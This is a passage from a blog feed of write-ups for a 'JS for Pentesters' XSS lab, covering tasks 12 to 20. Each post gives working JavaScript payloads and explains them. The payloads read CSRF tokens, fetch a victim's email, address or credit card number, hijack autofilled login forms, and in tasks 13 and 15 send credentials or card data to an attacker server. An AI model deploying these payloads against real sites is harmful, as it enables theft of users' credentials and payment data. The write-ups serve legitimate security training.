class="nt">&lt;/script&gt;</span></code></pre></figure> <p>So let us see what we have done here. What we basically doing here is that we need to get the token from the first request which in turn gives back a JSON file from which we need to parse and get the token and using this token we need to send a request to <code class="language-plaintext highlighter-rouge">/lab/webapp/jfp/20/getpassword</code> which will give us the correct password. Most of the modern browsers supports the JSON.parse function which helps us in parsing the JSON file got back by as the result.</p> <p><strong>Note:</strong></p> <p>1) While playing with XSS challenges, it is always recommended to use Mozilla Firefox because Google chrome has inbuilt <strong>XSS</strong> stopper which will stop us from executing arbitrary JavaScript code even if the page is vulnerable to XSS. So its strongly recommended to use Firefox instead of chrome.</p> <p>We hope that you really liked this challenge. If there is anything you didn’t understand or wanted to get more clarity, please comment down and we are more than happy to help. Also, if you get a better way of solving the challenge, please share it with us and we are happy to learn from our readers too. Happy pentesting..</p> Mon, 03 Nov 2014 06:36:49 -0800 https://blog.0daylabs.com/2014/11/03/xss-multilevel-json-parsing-js-pentesters-task-20/ https://blog.0daylabs.com/2014/11/03/xss-multilevel-json-parsing-js-pentesters-task-20/ jsp javascript xss security-tube XSS - Multilevel HTML parsing: JS for Pentesters task 19 write up <p>In the last challenge we saw how can we receive and <a href="https://blog.0daylabs.com/2014/11/02/xss-html-parsing-xmlhttprequest-js-pentesters-task-18/">parse an HTML</a> file that we get back as a result of a successful <code class="language-plaintext highlighter-rouge">XMLHttpRequest()</code>. But when we take it to the next level, things became a bit more difficult. Let us now see how to do a multilevel HTML parsing in order to solve a challenge.</p> <p><a href="http://pentesteracademylab.appspot.com/lab/webapp/jfp/19">JS for Pentesters task 19</a></p> <p>Our objective is to Find John’s Credit Card Number using an XSS vulnerability on this page and Display the Credit Card Number in the div with id “result”.  Here the challenge is very easy but a bit time consuming to construct the correct payload. The working payload looks like this:</p> <figure class="highlight"><pre><code class="language-html" data-lang="html"> <span class="nt">&lt;script&gt;</span> <span class="kd">var</span> <span class="nx">xhr</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">XMLHttpRequest</span><span class="p">();</span> <span class="kd">var</span> <span class="nx">xhr2</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">XMLHttpRequest</span><span class="p">();</span> <span class="kd">var</span> <span class="nx">csrf_token</span> <span class="o">=</span> <span class="dl">''</span><span class="p">;</span> <span class="kd">var</span> <span class="nx">uid</span> <span class="o">=</span> <span class="dl">''</span><span class="p">;</span> <span class="nx">xhr2</span><span class="p">.</span><span class="nx">onreadystatechange</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="p">(</span><span class="nx">xhr2</span><span class="p">.</span><span class="nx">readyState</span> <span class="o">==</span> <span class="mi">4</span> <span class="o">&amp;&amp;</span> <span class="nx">xhr2</span><span class="p">.</span><span class="nx">status</span> <span class="o">==</span> <span class="mi">200</span><span class="p">)</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">html</span> <span class="o">=</span> <span class="nx">xhr2</span><span class="p">.</span><span class="nx">responseXML</span><span class="p">;</span> <span class="nx">credit</span> <span class="o">=</span> <span class="nx">html</span><span class="p">.</span><span class="nx">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">result</span><span class="dl">"</span><span class="p">).</span><span class="nx">innerHTML</span><span class="p">;</span> <span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">credit</span><span class="p">);</span> <span class="nb">document</span><span class="p">.</span><span class="nx">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">result</span><span class="dl">"</span><span class="p">).</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="nx">credit</span><span class="p">;</span> <span class="p">}</span> <span class="p">}</span> <span class="nx">xhr</span><span class="p">.</span><span class="nx">onreadystatechange</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="k">if</span> <span class="p">(</span><span class="nx">xhr</span><span class="p">.</span><span class="nx">readyState</span> <span class="o">==</span> <span class="mi">4</span> <span class="o">&amp;&amp;</span> <span class="nx">xhr</span><span class="p">.</span><span class="nx">status</span> <span class="o">==</span> <span class="mi">200</span><span class="p">)</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">html2</span> <span class="o">=</span> <span class="nx">xhr</span><span class="p">.</span><span class="nx">responseXML</span><span class="p">;</span> <span class="nx">csrf_token</span> <span class="o">=</span> <span class="nx">html2</span><span class="p">.</span><span class="nx">forms</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="nx">elements</span><span class="p">[</span><span class="mi">1</span><span class="p">].</span><span class="nx">value</span><span class="p">;</span> <span class="nx">alert</span><span class="p">(</span><span class="nx">csrf_token</span><span class="p">);</span> <span class="nx">xhr2</span><span class="p">.</span><span class="nx">open</span><span class="p">(</span><span class="dl">"</span><span class="s2">GET</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">/lab/webapp/jfp/19/getcreditcard?uid=</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">uid</span> <span class="o">+</span> <span class="dl">"</span><span class="s2">&amp;csrf_token=</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">csrf_token</span><span class="p">,</span> <span class="kc">true</span><span class="p">);</span> <span class="nx">xhr2</span><span class="p">.</span><span class="nx">responseType</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">document</span><span class="dl">"</span><span class="p">;</span> <span class="nx">xhr2</span><span class="p">.</span><span class="nx">send</span><span class="p">();</span> <span class="p">}</span> <span class="p">}</span> <span class="kd">var</span> <span class="nx">link</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">settings</span><span class="dl">"</span><span class="p">);</span> <span class="kd">var</span> <span class="nx">uid</span> <span class="o">=</span> <span class="nx">link</span><span class="p">.</span><span class="nx">innerHTML</span><span class="p">.</span><span class="nx">split</span><span class="p">(</span><span class="dl">"</span><span class="s2">:</span><span class="dl">"</span><span class="p">)[</span><span class="mi">1</span><span class="p">];</span> <span class="nx">xhr</span><span class="p">.</span><span class="nx">open</span><span class="p">(</span><span class="dl">"</span><span class="s2">GET</span><span class="dl">"</span><span class="p">,</span> <span class="nx">link</span><span class="p">.</span><span class="nx">href</span><span class="p">,</span> <span class="kc">true</span><span class="p">);</span> <span class="nx">xhr</span><span class="p">.</span><span class="nx">responseType</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">document</span><span class="dl">"</span><span class="p">;</span> <span class="nx">xhr</span><span class="p">.</span><span class="nx">send</span><span class="p">();</span> <span class="nt">&lt;/script&gt;</span></code></pre></figure> <p>What we are doing here is very simple. Since we have to parse multiple HTML page (to be precise, 2 HTML pages) we need to specify more than 1 <code class="language-plaintext highlighter-rouge">XMLHttpRequests</code> (2 to be precise). So we declared 2 XMLHttpRequest(), we called the first request and when it is successfully done, we call the 2nd one within the first one from which we will get the credit card number. Then we will use that number to display it in the “result” id in the main page.</p> <p><strong>Note:</strong></p> <p>1) While playing with XSS challenges, it is always recommended to use Mozilla Firefox because Google chrome has inbuilt <strong>XSS</strong> stopper which will stop us from executing arbitrary JavaScript code even if the page is vulnerable to XSS. So its strongly recommended to use Firefox instead of chrome.</p> <p>We hope that you really liked this challenge. If there is anything you didn’t understand or wanted to get more clarity, please comment down and we are more than happy to help. Also, if you get a better way of solving the challenge, please share it with us and we are happy to learn from our readers too. Happy pentesting..</p> Mon, 03 Nov 2014 06:16:08 -0800 https://blog.0daylabs.com/2014/11/03/xss-multilevel-html-parsing-js-pentesters-task-19-write/ https://blog.0daylabs.com/2014/11/03/xss-multilevel-html-parsing-js-pentesters-task-19-write/ jsp javascript xss security-tube XSS - HTML parsing with XMLHttpRequest(): JS for Pentesters task 18 <p>XMLHttpRequest() is very powerful which can even retrieve html, JSON, XML etc as response to a request. This challenge is an example of one of them. Usually when we do a request, we get back a string which was easy to manipulate and use for our own purpose. What if the return is an HTML page and we need to get something out of it ? This what this challenge looks in:</p> <p><a href="http://pentesteracademylab.appspot.com/lab/webapp/jfp/18">JS for Pentesters task 18</a></p> <p>Our objective is to Find John’s Postal Address using an XSS vulnerability on that page and Display the Postal address in the div with id “result”. Before moving on to solve this task, one thing to keep in mind that if we need to get back an HTML document as response to an XMLHttpRequest(), we need to specify it explicitly by stating** responseType = “document”;**.  So let us see how we cracked this and the payload is :</p> <figure class="highlight"><pre><code class="language-html" data-lang="html"> <span class="nt">&lt;script&gt;</span> <span class="kd">var</span> <span class="nx">req</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">XMLHttpRequest</span><span class="p">();</span> <span class="nx">req</span><span class="p">.</span><span class="nx">onreadystatechange</span><span class="o">=</span><span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="k">if</span> <span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">readyState</span><span class="o">==</span><span class="mi">4</span> <span class="o">&amp;&amp;</span> <span class="nx">req</span><span class="p">.</span><span class="nx">status</span><span class="o">==</span><span class="mi">200</span><span class="p">)</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">html</span> <span class="o">=</span> <span class="nx">req</span><span class="p">.</span><span class="nx">responseXML</span><span class="p">;</span> <span class="kd">var</span> <span class="nx">address</span> <span class="o">=</span> <span class="nx">html</span><span class="p">.</span><span class="nx">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">address</span><span class="dl">"</span><span class="p">).</span><span class="nx">innerHTML</span><span class="p">;</span> <span class="p">}</span> <span class="nb">document</span><span class="p">.</span><span class="nx">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">result</span><span class="dl">"</span><span class="p">).</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="nx">address</span><span class="p">;</span> <span class="p">};</span> <span class="nx">req</span><span class="p">.</span><span class="nx">open</span><span class="p">(</span><span class="dl">"</span><span class="s2">GET</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">/lab/webapp/jfp/18/address</span><span class="dl">"</span><span class="p">,</span> <span class="kc">true</span><span class="p">);</span> <span class="nx">req</span><span class="p">.</span><span class="nx">responseType</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">document</span><span class="dl">"</span><span class="p">;</span> <span class="nx">req</span><span class="p">.</span><span class="nx">send</span><span class="p">();</span> <span class="nt">&lt;/script&gt;</span></code></pre></figure> <p>So how is this working ? We send an <code class="language-plaintext highlighter-rouge">XMLHttpRequest()</code> and since we have stated the <strong>responseType </strong>before sending the request, the response will be an entire HTML page. So first we saved the HTML page in to a variable named html and from inside the HTML we got, we selected the “address” element id which contains the address we are looking for. Then we place that string which we got back in to the original page’s “result” id and there, the challenge is cracked ;)</p> <p><strong>Note:</strong></p> <p>1) While playing with XSS challenges, it is always recommended to use Mozilla Firefox because Google chrome has inbuilt <strong>XSS</strong> stopper which will stop us from executing arbitrary JavaScript code even if the page is vulnerable to XSS. So its strongly recommended to use Firefox instead of chrome.</p> <p>We hope that you really liked this challenge. If there is anything you didn’t understand or wanted to get more clarity, please comment down and we are more than happy to help. Also, if you get a better way of solving the challenge, please share it with us and we are happy to learn from our readers too. Happy pentesting..</p> Sun, 02 Nov 2014 05:34:20 -0800 https://blog.0daylabs.com/2014/11/02/xss-html-parsing-xmlhttprequest-js-pentesters-task-18/ https://blog.0daylabs.com/2014/11/02/xss-html-parsing-xmlhttprequest-js-pentesters-task-18/ jsp javascript xss security-tube CSRF token stealing with XSS: JS for Pentesters task 17 write up <p>We have already seen several challenges already which we solved using XMLHttpRequest(). This is yet another challenge which can be solved with the same but the difference is that in order to the email address, we need to add something called <strong>csrf_token</strong> to url and only then our session is valid. csrf_tokens are generally used to protect the sessions and to prevent un-authorized entries. But if a site is vulnerable to XSS, csrf token protection can easily be bypassed as JavaScript can read csrf tokens. Here is a very simple example illustrating the same.</p> <p><a href="http://pentesteracademylab.appspot.com/lab/webapp/jfp/17">JS for Pentesters task 17</a></p> <p>Our objective is to Find John’s Email Address using an XSS vulnerability on that page and Display the Email address in the div with id “result”. A condition to follow is that No Hardcoded values can be used - everything has to be figured out dynamically. For the ease, the token and uid has been saved in the HTML file itself so that we can hard code it to break the challenge but the Author has specifically mentioned that everything has to be figured out dynamically ! Let us see how the payload looks like:</p> <figure class="highlight"><pre><code class="language-html" data-lang="html"> <span class="nt">&lt;script&gt;</span> <span class="kd">var</span> <span class="nx">request</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">XMLHttpRequest</span><span class="p">();</span> <span class="nx">request</span><span class="p">.</span><span class="nx">onreadystatechange</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="k">if</span> <span class="p">(</span><span class="nx">request</span><span class="p">.</span><span class="nx">readyState</span> <span class="o">==</span> <span class="mi">4</span> <span class="o">&amp;&amp;</span> <span class="nx">request</span><span class="p">.</span><span class="nx">status</span> <span class="o">==</span> <span class="mi">200</span><span class="p">)</span> <span class="p">{</span> <span class="nb">document</span><span class="p">.</span><span class="nx">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">result</span><span class="dl">"</span><span class="p">).</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="nx">request</span><span class="p">.</span><span class="nx">responseText</span><span class="p">;</span> <span class="p">}</span> <span class="p">};</span> <span class="kd">var</span> <span class="nx">uid</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">getElementsByTagName</span><span class="p">(</span><span class="dl">"</span><span class="s2">p</span><span class="dl">"</span><span class="p">)[</span><span class="mi">0</span><span class="p">].</span><span class="nx">innerHTML</span><span class="p">;</span> <span class="kd">var</span> <span class="nx">csrf_token</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">getElementsByTagName</span><span class="p">(</span><span class="dl">"</span><span class="s2">p</span><span class="dl">"</span><span class="p">)[</span><span class="mi">1</span><span class="p">].</span><span class="nx">innerHTML</span><span class="p">;</span> <span class="nx">uid</span> <span class="o">=</span> <span class="nx">uid</span><span class="p">.</span><span class="nx">split</span><span class="p">(</span><span class="dl">"</span><span class="s2">:</span><span class="dl">"</span><span class="p">)[</span><span class="mi">1</span><span class="p">];</span> <span class="nx">csrf_token</span> <span class="o">=</span> <span class="nx">csrf_token</span><span class="p">.</span><span class="nx">split</span><span class="p">(</span><span class="dl">"</span><span class="s2">:</span><span class="dl">"</span><span class="p">)[</span><span class="mi">1</span><span class="p">];</span> <span class="nx">request</span><span class="p">.</span><span class="nx">open</span><span class="p">(</span><span class="dl">"</span><span class="s2">GET</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">/lab/webapp/jfp/17/email?uid=</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">uid</span> <span class="o">+</span> <span class="dl">"</span><span class="s2">&amp;csrf_token=</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">csrf_token</span><span class="p">,</span> <span class="kc">true</span><span class="p">);</span> <span class="nx">request</span><span class="p">.</span><span class="nx">send</span><span class="p">();</span> <span class="nt">&lt;/script&gt;</span></code></pre></figure> <p>So what have we done here basically is that we took the <strong>uid</strong> and <strong>csrt_token</strong> dynamically from the HTML page so that even if the token or uid changes in the future, the payload still works. Then we added the parameters to the URL and used it with an XMLHttpRequest() and we got back the email address as response.</p> <p><code class="language-plaintext highlighter-rouge">split()</code> is a JavaScript function that splits a string into 2 and return a list with 2 split elements. Since the uid and csrf was in the format <strong>id:token, </strong>we need to split it and take token value from it so that we can use it in making an XMLHttpRequest().</p> <p><strong>Note:</strong></p> <p>1) If you didn’t understand the payload properly, I strongly recommend you read the <a href="https://blog.0daylabs.com/2014/09/13/ajax-everything-you-should-know-about-xmlhttprequest/">basics of XMLHttpRequest()</a> first and then try again.</p> <p>2) While playing with XSS challenges, it is always recommended to use Mozilla Firefox because Google chrome has inbuilt <strong>XSS</strong> stopper which will stop us from executing arbitrary JavaScript code even if the page is vulnerable to XSS. So its strongly recommended to use Firefox instead of chrome.</p> <p>3) You have to <a href="meyerweb.com/eric/tools/dencoder/">URL encode </a>the payload before the injection via the url parameter or else this will fail to work</p> <p>We hope that you really liked this challenge. If there is anything you didn’t understand or wanted to get more clarity, please comment down and we are more than happy to help. Also, if you get a better way of solving the challenge, please share it with us and we are happy to learn from our readers too. Happy pentesting..</p> Sun, 02 Nov 2014 00:31:40 -0700 https://blog.0daylabs.com/2014/11/02/csrf-token-stealing-xss-javascript-pentesters-task-17-write/ https://blog.0daylabs.com/2014/11/02/csrf-token-stealing-xss-javascript-pentesters-task-17-write/ jsp javascript xss security-tube XSS - Ex-filtrating data with XMLHttpRequest(): JS for Pentesters task 15 write up <p>Till now we have seen 2 different challenges with XMLHttpRequest() with GET request. Now let us look into a challenge were we need to post data not by GET method but by POST method. Let us look into the challenge:</p> <p><a href="http://pentesteracademylab.appspot.com/lab/webapp/jfp/15">JS for Pentesters task 15</a></p> <p>Our Objective of the challenge is to Find John’s Credit Card Number using an XSS vulnerability on this page and post the Credit Card Number to your Attacker Server. Here as we stated above, the key difference is that we should do a POST request to the server. Let us look into the correct payload:</p> <figure class="highlight"><pre><code class="language-html" data-lang="html"> <span class="nt">&lt;script&gt;</span> <span class="kd">var</span> <span class="nx">xhr</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">XMLHttpRequest</span><span class="p">();</span> <span class="nx">xhr</span><span class="p">.</span><span class="nx">open</span><span class="p">(</span><span class="dl">'</span><span class="s1">POST</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">http://pentesteracademylab.appspot.com/lab/webapp/jfp/15/cardstore</span><span class="dl">'</span><span class="p">,</span> <span class="kc">true</span><span class="p">);</span> <span class="nx">xhr</span><span class="p">.</span><span class="nx">setRequestHeader</span><span class="p">(</span><span class="dl">'</span><span class="s1">Content-type</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">application/x-www-form-urlencoded</span><span class="dl">'</span><span class="p">);</span> <span class="nx">xhr</span><span class="p">.</span><span class="nx">onload</span> <span class="o">=</span> <span class="kd">function</span> <span class="p">()</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">request</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">XMLHttpRequest</span><span class="p">();</span> <span class="nx">request</span><span class="p">.</span><span class="nx">open</span><span class="p">(</span><span class="dl">'</span><span class="s1">GET</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">http://localhost:8000/?creditcard=</span><span class="dl">'</span><span class="o">+</span><span class="nx">xhr</span><span class="p">.</span><span class="nx">responseText</span><span class="p">,</span> <span class="kc">true</span><span class="p">);</span> <span class="nx">request</span><span class="p">.</span><span class="nx">send</span><span class="p">()</span> <span class="p">};</span> <span class="nx">xhr</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="dl">'</span><span class="s1">user=john</span><span class="dl">'</span><span class="p">);</span> <span class="nt">&lt;/script&gt;</span></code></pre></figure> <p>So what have we done above ? We have created a new <code class="language-plaintext highlighter-rouge">XMLHttpRequest()</code> object and then we opened the link by specifying the request type as POST. Then we used the setRequestHeader() so that the entire URL should be properly encoded or else it won’t work. After that, its all normal procedure like we did before. A small difference is that we are declaring one more XMLHttpRequest() object inside the <strong>onload</strong> since we need to post it our server also. You can do that without XMLHttpRequest too but I just prefer to use it. In the <code class="language-plaintext highlighter-rouge">xhr.send()</code>, inside the brackets, we gave the POST parameters and here, it is <strong>user=john.</strong></p> <p><strong>Note:</strong></p> <p>1) If you didn’t understand the payload properly, I strongly recommend you read the basics of <a href="https://blog.0daylabs.com/2014/09/13/ajax-everything-you-should-know-about-xmlhttprequest/">XMLHttpRequest()</a> first and then try again.</p> <p>2) While playing with <strong>XSS</strong> challenges, it is always recommended to use Mozilla Firefox because Google chrome has inbuilt <strong>XSS</strong> stopper which will stop us from executing arbitrary JavaScript code even if the page is vulnerable to XSS. So its strongly recommended to use Firefox instead of chrome.</p> <p>3) You have to <a href="http://meyerweb.com/eric/tools/dencoder/">URL encode</a> the payload before the injection via the url parameter or else this will fail to work</p> <p>We hope that you really liked this challenge. If there is anything you didn’t understand or wanted to get more clarity, please comment down and we are more than happy to help. Also, if you get a better way of solving the challenge, please share it with us and we are happy to learn from our readers too. Happy pentesting..</p> Sat, 01 Nov 2014 08:12:32 -0700 https://blog.0daylabs.com/2014/11/01/xss-ex-filtrating-data-xmlhttprequest-js-pentesters-task-15-write/ https://blog.0daylabs.com/2014/11/01/xss-ex-filtrating-data-xmlhttprequest-js-pentesters-task-15-write/ jsp javascript xss security-tube XSS - fetching data with XMLHttpRequest: JS for Pentesters task 14 <p>Recently we saw an introduction challenge to <a href="https://blog.0daylabs.com/2014/10/31/xss-posting-xmlhttprequest-js-pentesters-task-13/">XMLHttpRequest()</a> which was quite easy and covers only the basics of the same. Now this is a bit advanced comparing to the basic one. Let us look into the challenge:</p> <h3 id="js-for-pentesters-task-14"><a href="http://pentesteracademylab.appspot.com/lab/webapp/jfp/14">JS for Pentesters task 14</a></h3> <p>Our objective is to Find John’s Email Address using an XSS vulnerability on this page and Display the Email address in the div with id “result”. So when you check the source code of the challenge, you can see that we need to send a GET request to “/lab/webapp/jfp/14/email” with the parameter name = John which will return the email address for you. We should display this email address in the webpage. Before continuing this challenge, I strongly recommend you to read this: “<a href="https://blog.0daylabs.com/2014/09/13/ajax-everything-you-should-know-about-xmlhttprequest/">Everything you should know about XMLHttpRequest()</a>”. Let us look into the payload:</p> <figure class="highlight"><pre><code class="language-html" data-lang="html"> <span class="nt">&lt;script&gt;</span> <span class="kd">var</span> <span class="nx">request</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">XMLHttpRequest</span><span class="p">();</span> <span class="nx">request</span><span class="p">.</span><span class="nx">onreadystatechange</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="k">if</span> <span class="p">(</span><span class="nx">request</span><span class="p">.</span><span class="nx">readyState</span> <span class="o">==</span> <span class="mi">4</span> <span class="o">&amp;&amp;</span> <span class="nx">request</span><span class="p">.</span><span class="nx">status</span> <span class="o">==</span> <span class="mi">200</span><span class="p">)</span> <span class="p">{</span> <span class="nb">document</span><span class="p">.</span><span class="nx">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">result</span><span class="dl">"</span><span class="p">).</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="nx">request</span><span class="p">.</span><span class="nx">responseText</span><span class="p">;</span> <span class="p">}</span> <span class="p">}</span> <span class="nx">request</span><span class="p">.</span><span class="nx">open</span><span class="p">(</span><span class="dl">"</span><span class="s2">GET</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">/lab/webapp/jfp/14/email?name=john</span><span class="dl">"</span><span class="p">,</span> <span class="kc">true</span><span class="p">);</span> <span class="nx">request</span><span class="p">.</span><span class="nx">send</span><span class="p">();</span> <span class="nt">&lt;/script&gt;</span></code></pre></figure> <p>Now how is this working ? First, we are creating a new XMLHttpObject() and use it as a GET request to the specified link. Then when the request has been done successfully and response is ready, we put the response inside the result element and there, we cracked the challenge.</p> <p><strong>Note:</strong></p> <p>1) If you didn’t understand the payload properly, I strongly recommend you read the basics of <a href="https://blog.0daylabs.com/2014/09/13/ajax-everything-you-should-know-about-xmlhttprequest/">XMLHttpRequest() </a>first and then try again.</p> <p>2) While playing with <strong>XSS challenges</strong>, it is always recommended to use Mozilla Firefox because Google chrome has inbuilt XSS stopper which will stop us from executing arbitrary JavaScript code even if the page is vulnerable to XSS. So its strongly recommended to use Firefox instead of chrome.</p> <p>3) You have to <a href="http://meyerweb.com/eric/tools/dencoder/">URL encode</a> the payload before the injection via the url parameter or else this will fail to work</p> <p>We hope that you really liked this challenge. If there is anything you didn’t understand or wanted to get more clarity, please comment down and we are more than happy to help. Also, if you get a better way of solving the challenge, please share it with us and we are happy to learn from our readers too. Happy pentesting..</p> Fri, 31 Oct 2014 08:54:21 -0700 https://blog.0daylabs.com/2014/10/31/xss-fetching-data-xmlhttprequest-js-pentesters-task-14/ https://blog.0daylabs.com/2014/10/31/xss-fetching-data-xmlhttprequest-js-pentesters-task-14/ jsp javascript xss security-tube XSS - posting with XMLHttpRequest(): JS for Pentesters task 13 <p>We have already completed the challenge in which we steal from <a href="https://blog.0daylabs.com/2014/10/30/xss-stealing-auto-complete-js-pentesters-task-12-write/">Auto Complete</a>. Now this is the same challenge but the condition is that we need to use XMLHttpRequest to complete the challenge. If you are not familiar with XMLHttpRequest, I strongly recommend you to read the post “<strong><a href="https://blog.0daylabs.com/2014/09/13/ajax-everything-you-should-know-about-xmlhttprequest/">Everything you should know about XMLHttpRequest()</a></strong>”. Reading about XMLHttpRequest() basics will help you understand more and how to crack this challenge.</p> <p><a href="http://pentesteracademylab.appspot.com/lab/webapp/jfp/13">JS for Pentesters task 13</a></p> <p>Our objectives are Write JS attack code which waits for 10 seconds, then submits the form automatically to your Attack server using an XMLHttpRequest() call. Let us see how this can be done.</p> <p>Basically what we need is to use <strong>setTimeout()</strong> function in JavaScript which will execute a function after a specified amount of time. So we can use it run the function we defined and within that, we can specify to post the credentials to the server we host. The payload looks like this:</p> <figure class="highlight"><pre><code class="language-html" data-lang="html"> <span class="nt">&lt;script&gt;</span> <span class="kd">var</span> <span class="nx">user</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">forms</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="nx">elements</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="nx">value</span><span class="p">;</span> <span class="kd">var</span> <span class="nx">pass</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">forms</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="nx">elements</span><span class="p">[</span><span class="mi">1</span><span class="p">].</span><span class="nx">value</span><span class="p">;</span> <span class="nb">window</span><span class="p">.</span><span class="nx">setTimeout</span><span class="p">(</span> <span class="kd">function</span> <span class="p">()</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">request</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">XMLHttpRequest</span><span class="p">();</span> <span class="nx">request</span><span class="p">.</span><span class="nx">open</span><span class="p">(</span><span class="dl">"</span><span class="s2">GET</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">http://localhost:8000/?user=</span><span class="dl">"</span><span class="o">+</span><span class="nx">user</span><span class="o">+</span><span class="dl">"</span><span class="s2">&amp;pass=</span><span class="dl">"</span><span class="o">+</span><span class="nx">pass</span><span class="p">,</span> <span class="kc">true</span><span class="p">);</span> <span class="nx">request</span><span class="p">.</span><span class="nx">send</span><span class="p">()</span> <span class="p">},</span> <span class="mi">5000</span><span class="p">);</span> <span class="nt">&lt;/script&gt;</span></code></pre></figure> <p>So lets see what are we doing here. First we are declaring 2 variables with which we takes in the username and password that the user enters. Then we use the <strong>window.setTimeout()</strong> function which will execute a function after 5000 milliseconds or 5 seconds. Inside the function, we are declaring a new XMLHttpRequest() object using which we are sending data to our server (I used to host an HTTP server locally).</p> <p><strong>Note:</strong></p> <p>1) While playing with <strong>XSS challenges</strong>, it is always recommended to use Mozilla Firefox because Google chrome has inbuilt XSS stopper which will stop us from executing arbitrary JavaScript code even if the page is vulnerable to XSS. So its strongly recommended to use Firefox instead of chrome.</p> <p>We hope that you really liked this challenge. If there is anything you didn’t understand or wanted to get more clarity, please comment down and we are more than happy to help. Also, if you get a better way of solving the challenge, please share it with us and we are happy to learn from our readers too. Happy pentesting..</p> Fri, 31 Oct 2014 07:22:28 -0700 https://blog.0daylabs.com/2014/10/31/xss-posting-xmlhttprequest-js-pentesters-task-13/ https://blog.0daylabs.com/2014/10/31/xss-posting-xmlhttprequest-js-pentesters-task-13/ jsp javascript xss security-tube XSS - Stealing from Auto complete: JS for Pentesters task 12 write up <p>Stealing from AutoComplete ? Well, that was the same reaction which comes to my mind when I went through this challenge. Usually people have a habit of saving their Username:Password combinations to the browser so that they don’t want to type and repeat the same thing again when they login next time. But if the web application that the user tries to login is vulnerable to XSS, then this action will be dangerous !</p> <p><a href="http://pentesteracademylab.appspot.com/lab/webapp/jfp/12">JS for Pentesters task 12</a></p> <p>Once you get into the challenge page, try entering a random username:password combination and click sign in. When the browser ask if you wanna save the password or not, click on remember password. So what happens is that next time if we visit the page, the username:password fields will be automatically filled by the browser for us. Let us see how can we steal this information:</p> <p>So here what we basically want to do is to submit this form automatically without user intervention to an attacker server. We also needs to modify the form submit action so that it can point to our server instead of the original server. So the payload looks like this:</p> <figure class="highlight"><pre><code class="language-html" data-lang="html"> <span class="nt">&lt;script&gt;</span> <span class="nb">window</span><span class="p">.</span><span class="nx">setTimeout</span><span class="p">(</span><span class="kd">function</span> <span class="p">()</span> <span class="p">{</span> <span class="nb">document</span><span class="p">.</span><span class="nx">forms</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="nx">action</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">http://pentesteracademylab.appspot.com/lab/webapp/1</span><span class="dl">"</span><span class="p">;</span> <span class="nb">document</span><span class="p">.</span><span class="nx">forms</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="nx">submit</span><span class="p">();</span> <span class="p">},</span> <span class="mi">10000</span><span class="p">);</span> <span class="nt">&lt;/script&gt;</span></code></pre></figure> <p>Here what we are doing is that we are using the <code class="language-plaintext highlighter-rouge">setTimeout()</code> function in JavaScript which helps us in executing a function after a specified interval of time. So inside that function, we will use a user defined function in which we modify the document submit action to our own server and then we will call <code class="language-plaintext highlighter-rouge">.submit()</code> function which will automatically submit the form.</p> <p>We cannot use an eventHandler (which seems can also be used) because while using <code class="language-plaintext highlighter-rouge">.submit()</code>, we are submitting form automatically and not by user clicking on the same. so eventHandler won’t be provoked while doing it.</p> <p><strong>Note:</strong></p> 